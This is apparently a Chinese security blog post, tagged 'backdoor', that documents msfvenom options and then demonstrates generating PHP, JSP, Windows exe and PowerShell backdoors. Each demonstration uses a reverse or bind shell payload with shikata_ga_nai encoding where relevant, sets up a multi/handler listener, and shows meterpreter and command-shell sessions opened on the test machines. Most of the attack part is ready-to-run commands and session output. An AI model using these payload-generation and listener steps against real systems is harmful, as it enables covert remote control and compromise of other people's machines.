标签归档:后门

Metasploit Framework msfvenom

msfvenom命令行选项如下:

Options:

-p, --payload <payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&#039;-&#039;或者stdin指定
-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-n, --nopsled <length> 为payload预先指定一个NOP滑动长度
-f, --format <format> 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
-e, --encoder [encoder] 指定需要使用的encoder(编码器)
-a, --arch <architecture> 指定payload的目标架构
--platform <platform> 指定payload的目标平台
-s, --space <length> 设定有效攻击荷载的最大长度
-b, --bad-chars <list> 设定规避字符集,比如: &#039;\x00\xff&#039;
-i, --iterations <count> 指定payload的编码次数
-c, --add-code <path> 指定一个附加的win32 shellcode文件
-x, --template <path> 指定一个自定义的可执行文件作为模板
-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
--payload-options 列举payload的标准选项
-o, --out <path> 保存payload,可以用“>”号代替 
-v, --var-name <name> 指定一个自定义的变量,以确定输出格式
--shellest 最小化生成payload
-h, --help 查看帮助选项

–help-formats 查看msf支持的输出格式列表

root@kali:/usr/share/metasploit-framework/modules/payloads/singles# msfvenom --help-formats
Executable formats
	asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
Transform formats
	bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

-f指定格式参数可以用单个大写字母代替:
例如:X 代表 -f exe

[H]arp
[P]erl
Rub[Y]
[R]aw
[J]s
e[X]e
[D]ll
[V]BA
[W]ar
Pytho[N]

先看一下payload,到目前共有437个payload,大致归类不同的操作平台windows/linux/osx/android和不同的编程语言python/php等。
root@kali:~# msfvenom -l payloads

查看支持编码
root@kali:~# msfvenom -l encoders
如果你使用了-b选项(设定了规避字符集),会自动调用编码器。
其他情况下,你需要使用-e选项来使用编码模块,例如:
./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -f raw
也可以使用-i选项进行多次编码。
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=172.16.100.128 LPORT=2345 -f exe -o abc.exe

下面演示一些用法:
Kali:172.16.100.182
测试机:172.16.100.155

PHP利用msfvenom生成后门


查看下php相关payload

msfvenom -l payloads | grep php

这里我们用bind_php来测试

php/bind_php Listen for a connection and spawn a command shell via php

查看配置项

root@kali:~# msfvenom -p php/bind_php --payload-options

生成后门

msfvenom -p php/bind_php RHOST=172.16.100.155 R

去掉开头的/*
访问http://172.16.100.155/1.php查看监听

[root@vincenthostname html]# netstat -antlp | grep httpd
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 1494/httpd

 

msf > use multi/handler
msf exploit(handler) > set payload php/bind_php
payload => php/bind_php
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------



Payload options (php/bind_php):

Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address



Exploit target:

Id Name
-- ----
0 Wildcard Target



msf exploit(handler) > set rhost 172.16.100.155
rhost => 172.16.100.155
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started bind handler
msf exploit(handler) > [*] Command shell session 1 opened (172.16.100.182:43351 -> 172.16.100.155:4444) at 2017-09-14 15:57:11 +0800

 

升级为Meterpreter

msf exploit(handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.100.182:4433 
[*] Sending stage (826840 bytes) to 172.16.100.155
[*] Meterpreter session 2 opened (172.16.100.182:4433 -> 172.16.100.155:43087) at 2017-09-14 15:58:49 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption
[*] Command stager progress: 100.00% (736/736 bytes)
msf exploit(handler) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell php/php 172.16.100.182:43351 -> 172.16.100.155:4444 (172.16.100.155)
2 meterpreter x86/linux uid=48, gid=48, euid=48, egid=48 @ 172.16.100.155 172.16.100.182:4433 -> 172.16.100.155:43087 (172.16.100.155)

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer : 172.16.100.155
OS : CentOS 6.5 (Linux 2.6.39)
Architecture : x64
Meterpreter : x86/linux

JAVA利用msfvenom生成后门


查看下可以使用的payload

msfvenom -l payloads | grep java

这里我们使用

java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.100.182 > /tmp/shell.jsp
Payload size: 1500 bytes

访问后获取反弹shell

msf > use multi/handler
msf exploit(handler) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(handler) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
msf exploit(handler) > [*] Command shell session 1 opened (172.16.100.182:4444 -> 172.16.100.1:5509) at 2017-09-14 16:11:10 +0800
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows [°汾 6.1.7601]
°爨̹Ԑ (c) 2009 Microsoft Corporation¡£±£´̹ԐȨ{¡£

E:\tomcat\bin>whoami
whoami
dell-pc\dell

Windows利用msfvenom生成后门


root@kali-vincent:/tmp# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=172.16.100.128 LPORT=2345 -f exe -o abc.exe

本地监听:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.100.128
LHOST => 172.16.100.128
msf exploit(handler) > set LPORT 2345
LPORT => 2345
msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.100.128:2345 
[*] Starting the payload handler...
[*] Sending stage (885806 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.128:2345 -> 172.16.100.1:56101) at 2016-03-20 16:08:55 +0800

meterpreter > sysinfo 
Computer : DELL-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64 (Current Process is WOW64)
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32

Windows生成powershell后门


msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.100.182 LPORT=6666 -f psh-reflection > test.ps1
msf > use multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:6666

然后Windows下运行powershell -file “test.ps1”

msf exploit(handler) > 
[*] Sending stage (194623 bytes) to 172.16.100.1
[*] Meterpreter session 6 opened (172.16.100.182:6666 -> 172.16.100.1:62470) at 2017-09-23 17:33:08 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

msf exploit(handler) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > getuid
Server username: dell-PC\dell

参考文章
http://www.freebuf.com/sectool/72135.html
http://www.huo119.com/post/909.shtm